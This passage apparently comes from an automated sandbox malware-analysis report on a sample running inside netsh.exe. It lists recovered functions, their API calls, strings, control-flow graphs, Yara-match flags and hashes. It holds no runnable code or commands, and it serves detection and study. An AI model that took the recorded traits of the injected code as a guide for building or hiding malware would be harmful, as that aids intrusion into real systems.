              Function 00D92D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 60998fbc5393dbd916cdf87092e21f1d5cdebfee08534655691a15f6087a148b
              • Instruction ID: c4b19e0eaa566d3e61e15d1cd33d54cb78eb7bc83326dd5328ea409250adbaec
              • Opcode Fuzzy Hash: 60998fbc5393dbd916cdf87092e21f1d5cdebfee08534655691a15f6087a148b
              • Instruction Fuzzy Hash: 1790026971340002D3807198540860A000587D2302F95D426A4015668CCD1589696331
              Function 00D92EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 6b9a33a34bb259a4352ceb16e86499076936345f7705d187593647345bfec722
              • Instruction ID: 276aba18b2c666303e40c595e0d4e2f76152d00e52844d75603203aa0e0d4774
              • Opcode Fuzzy Hash: 6b9a33a34bb259a4352ceb16e86499076936345f7705d187593647345bfec722
              • Instruction Fuzzy Hash: C79002B170140402D34071984404746000587D1301F55C022A9064664E8A598ED57675
              Function 00D92FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2af0223d28b3e081c32cf8addde6267cbbdf41a65dde2d3c16f87db237b9873c
              • Instruction ID: 0f93a5ddad8f26645f337c3a5815dbba8e039ef0f949ef7a8bc3504b80b46ba0
              • Opcode Fuzzy Hash: 2af0223d28b3e081c32cf8addde6267cbbdf41a65dde2d3c16f87db237b9873c
              • Instruction Fuzzy Hash: AA900261711C0042D30075A84C14B07000587D1303F55C126A4154664CCD1589616531
              Function 00D92F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c49aee22b93945c38e7094ede9edf338f5f4dc23113b87e506f6ab70b93b3daa
              • Instruction ID: ffa8fe6011805b7ebe9f84b2995d18e1abb48601f8f276f47d9b1a7b0c49aaaa
              • Opcode Fuzzy Hash: c49aee22b93945c38e7094ede9edf338f5f4dc23113b87e506f6ab70b93b3daa
              • Instruction Fuzzy Hash: E19002A174140442D30071984414B060005C7E2301F55C026E5064664D8A19CD527136
              Function 00D935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e18e332b627b15ac1e506c48e5e790c3a3b0c2b8d27a2ba294e9738887b3fbf3
              • Instruction ID: 5afa92d809626c0f0b74d020495e1f002006a7ef3c898c9131f1bdd2b42b7a95
              • Opcode Fuzzy Hash: e18e332b627b15ac1e506c48e5e790c3a3b0c2b8d27a2ba294e9738887b3fbf3
              • Instruction Fuzzy Hash: 09900271B0550402D30071984514706100587D1301F65C422A4424678D8B958A5175B2
              Function 00419080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 485 419080-4190c2 call 41bd40 488 4190c8-419118 call 41be10 call 40acf0 call 414e50 485->488 489 41919c-4191a2 485->489 496 419120-419131 Sleep 488->496 497 419133-419139 496->497 498 419196-41919a 496->498 499 419163-419184 call 418eb0 497->499 500 41913b-419161 call 418ca0 497->500 498->489 498->496 505 419189-41918c 499->505 500->505 505->498
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 00419128
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
              • Instruction ID: 2511d3cdde594a459876a10949f18b9dbd63c8e6bbb0d03ebfda35d58ccafa52
              • Opcode Fuzzy Hash: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
              • Instruction Fuzzy Hash: 243192B2500345BBD724DF65C885FA7B7B9FB48B04F10811EF62E5B245D634B990CBA8
              Function 004191A4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 609 4191a4-4191ac 610 41916f-419184 call 418eb0 609->610 611 4191ae-4191d8 call 414e50 609->611 614 419189-41918c 610->614 617 4191f7-4191fc 611->617 618 4191da-4191f6 call 41f1f2 CreateThread 611->618 616 419196-41919a 614->616 619 419120-419131 Sleep 616->619 620 41919c-4191a2 616->620 619->616 623 419133-419139 619->623 624 419163-419169 623->624 625 41913b-419161 call 418ca0 623->625 624->610 625->614
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040F050,?,?,00000000), ref: 004191EC
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID: net.dll
              • API String ID: 2422867632-2431746569
              • Opcode ID: ad5e7f28f32926ce923828140b5cfa8639c3460879cf9296b84e7864fb638656
              • Instruction ID: 7300f322227102f16bcd6e2f7069b684d6053782363c66e42f5ed88aedb1cee5
              • Opcode Fuzzy Hash: ad5e7f28f32926ce923828140b5cfa8639c3460879cf9296b84e7864fb638656
              • Instruction Fuzzy Hash: 4901FC776002047AD7349A79DC46FE7B3A8DB80B15F14011EF91EA7280DA79B98487E9
              Function 0041A663 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 640 41a663-41a687 call 41af60 642 41a68c-41a6a1 RtlFreeHeap 640->642
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: bcc30635236e8fa720a28b406ee799dbec335dff77b832bd978397278855787d
              • Instruction ID: 24307b1b16fdc674b1b2a46e27d06997c9a9b4145e39e254628283c940cb61d2
              • Opcode Fuzzy Hash: bcc30635236e8fa720a28b406ee799dbec335dff77b832bd978397278855787d
              • Instruction Fuzzy Hash: 37E065B51142146FD724DF68CC48E9B776CDF48A54F118659B95857291C530E91087A0
              Function 0041A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
              Download Yara Rule
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
              Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00000000,?), ref: 0041A65D
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: 6EA
              • API String ID: 1279760036-1400015478
              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
              • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
              • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
              Function 00408308 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
              Download Yara Rule
              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 7e75bf849664dcd21a59adfd75ead6ad56d5676ebc833959a6e845d45839b9aa
              • Instruction ID: 5992b9be4baf2c7b566ef3647458cd36ce21ba925a148f2579bd006564dde71f
              • Opcode Fuzzy Hash: 7e75bf849664dcd21a59adfd75ead6ad56d5676ebc833959a6e845d45839b9aa
              • Instruction Fuzzy Hash: 9601D871A9032877E721A6959C43FFE7B6C9B44F94F04011DFF04BA1C2EAE8690543EA
              Function 00408310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
              Download Yara Rule
              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
              • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
              Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
              Function 0041A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
              Function 004191B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040F050,?,?,00000000), ref: 004191EC
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 89ef2758859c2e10bc0e5734033b475c64cd629f5ad8a823021e51abe1df765a
              • Instruction ID: 08ee09190344bf92f8f3f610aae4f3648aa43aed276248cc1f80d003229f7369
              • Opcode Fuzzy Hash: 89ef2758859c2e10bc0e5734033b475c64cd629f5ad8a823021e51abe1df765a
              • Instruction Fuzzy Hash: 32E092773803143AE3306599AC03FE7B39CDB81B24F14002AFA0DEB2C1D999F84542A8
              Function 0041A7C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F1D2,0040F1D2,?,00000000,?,?), ref: 0041A800
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 12bca789234c5c8e009ebb5de871be4c352e22ecce6a122e4c61cd4aa664f28b
              • Instruction ID: af75529915aef102090087d8ecb2994e73b38dbc4dd88fb73fd8a3c03c61f894
              • Opcode Fuzzy Hash: 12bca789234c5c8e009ebb5de871be4c352e22ecce6a122e4c61cd4aa664f28b
              • Instruction Fuzzy Hash: 28E06DB12002086FCB24DF65CC85EDB3769EF49350F118158F90D97241CA35E8118BB0
              Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F1D2,0040F1D2,?,00000000,?,?), ref: 0041A800
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
              Function 0041A6A4 Relevance: 1.5, APIs: 1, Instructions: 20processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 882eee7629ece8699dc18cc87715d42552190a95e794bad672922a76abbf6966
              • Instruction ID: 9926e89926c1833471749db3aad87792544e539113a25e0d4aa8347d48243819
              • Opcode Fuzzy Hash: 882eee7629ece8699dc18cc87715d42552190a95e794bad672922a76abbf6966
              • Instruction Fuzzy Hash: D6D0C9B66545046B9714DA9DAC81CE773ACEBD8A20710C71BF96C8B140893495528BB1
              Function 0040F6CA Relevance: 1.5, APIs: 1, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 2708cc23a197495d08e4d6a41a27bf5a19914847986057d4c8381ebeb1bbe9fb
              • Instruction ID: 39ff73362f3c324b3fb3a669c3a213d1a7861d9c5117aa6ee258ed075576ecec
              • Opcode Fuzzy Hash: 2708cc23a197495d08e4d6a41a27bf5a19914847986057d4c8381ebeb1bbe9fb
              • Instruction Fuzzy Hash: 4AD05E756903042BEA20BAE59C03F6A32896B84B14F094475F948EB3C3E9A5E50586A5
              Function 0040F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
              • Instruction ID: 16dd6e19701eb8137eea147804aeefc1d225e4ea9fc13a12949d67fdd6a7e390
              • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
              • Instruction Fuzzy Hash: 71D05E756503082AE610AAA59C03F6632886B44B04F490074F948AA3C3D964E4014169
              Function 00D92C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: a40027de4ef781911760e8ae3da504be8b82ab5d89f01a2e4708737ae6bf0dd4
              • Instruction ID: 501a512253bcc6fbf76193987e8ac099f8401599ba2222a771c05aeb091d3106
              • Opcode Fuzzy Hash: a40027de4ef781911760e8ae3da504be8b82ab5d89f01a2e4708737ae6bf0dd4
              • Instruction Fuzzy Hash: 5BB09B71D015C5D5DF11E760460971B790067D1701F19C072D2030751F4738D5D1F175

              Non-executed Functions

              Function 01568D48 Relevance: 65.2, APIs: 28, Strings: 9, Instructions: 447memorycomCOMMON
              Download Yara Rule
              APIs
              • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006,?,?,?), ref: 01568D7D
              • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(01561C9C,00000000,00000001,01561CAC,?), ref: 01568DAA
              • SysAllocString.OLEAUT32(?), ref: 01568DED
              • SysAllocString.OLEAUT32(?), ref: 01568E37
              • SysAllocString.OLEAUT32(?), ref: 01568E4B
              • SysAllocString.OLEAUT32(00000000), ref: 01568E54
              • SysAllocString.OLEAUT32(?), ref: 01568E77
              • SysFreeString.OLEAUT32(00000000), ref: 01568E92
              • SysFreeString.OLEAUT32(00000000), ref: 01568E99
              • SysFreeString.OLEAUT32(?), ref: 01568EA3
              • SysFreeString.OLEAUT32(?), ref: 01568EAD
              • SysFreeString.OLEAUT32(?), ref: 01568EB7
              • SysAllocString.OLEAUT32(WQL), ref: 01568F18
              • SysAllocString.OLEAUT32(select * from Win32_OperatingSystem), ref: 01568F29
              • VariantChangeType.OLEAUT32(?,?,00000000,00000017), ref: 01568FF1
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 01569044
              • VariantChangeType.OLEAUT32(?,?,00000000,00000017), ref: 015690A8
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 015690FB
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0156915B
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 015691B6
              • SysFreeString.OLEAUT32(?), ref: 01569211
              • SysFreeString.OLEAUT32(?), ref: 0156921B
              • SysFreeString.OLEAUT32(?), ref: 01569239
              • SysFreeString.OLEAUT32(00000000), ref: 01569240
              • SysFreeString.OLEAUT32(?), ref: 0156924A
              • SysFreeString.OLEAUT32(?), ref: 01569254
              • SysFreeString.OLEAUT32(?), ref: 0156925E
              • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 01569264
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: String$Free$Alloc$ChangeTypeVariant$CreateInitializeInstanceUninitialize
              • String ID: BuildNumber$OSProductSuite$OSType$ServicePackMajorVersion$ServicePackMinorVersion$Version$WQL$\\%s\root\cimv2$select * from Win32_OperatingSystem
              • API String ID: 3160123450-4179124359
              • Opcode ID: b4825d7b8a65ffa3d403a7fd9109aad673e32866d5c9d693966f8c0315df74fa
              • Instruction ID: eed71102687b058dded10d9b18a548389ad72a621ba98f1e97045d835cf41c9f
              • Opcode Fuzzy Hash: b4825d7b8a65ffa3d403a7fd9109aad673e32866d5c9d693966f8c0315df74fa
              • Instruction Fuzzy Hash: 03F19F76114701AFD7219F64D849B6FBBB9FBC8724F11091CFA659B250EB30E808DBA1
              Function 01567DFA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39windowCOMMON
              Download Yara Rule
              APIs
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,000000B6,00000000,?,00000000,?,?,01567F23,?,0156471D,000000B6,?), ref: 01567E14
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567F23,?,0156471D,000000B6,?), ref: 01567E20
              • wprintf.MSVCRT ref: 01567E2C
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,01567F23,?,0156471D,000000B6,?), ref: 01567E38
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,01567F23,?,0156471D), ref: 01567E51
              Strings
              • Error %d in FormatMessageW(), xrefs: 01567E27
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ErrorFormatFreeHandleLastLocalMessagewprintf
              • String ID: Error %d in FormatMessageW()
              • API String ID: 10433382-1232673963
              • Opcode ID: 1416dfd445c978fe3dbdf4d7cd585314c0240752aba4eff048487216b02e75bd
              • Instruction ID: d4163ed304435a9ad420cd52fd37090b51d555daaa3cfc8283636b7bcdcd2f78
              • Opcode Fuzzy Hash: 1416dfd445c978fe3dbdf4d7cd585314c0240752aba4eff048487216b02e75bd
              • Instruction Fuzzy Hash: 71F04F76511124FFDB2197A5AC0E99F7A6CEB84675F110114F9119B284D6304E04D7E0
              Function 01569B55 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
              Download Yara Rule
              APIs
              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 01569B82
              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 01569B91
              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 01569B9A
              • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 01569BA3
              • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 01569BB8
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
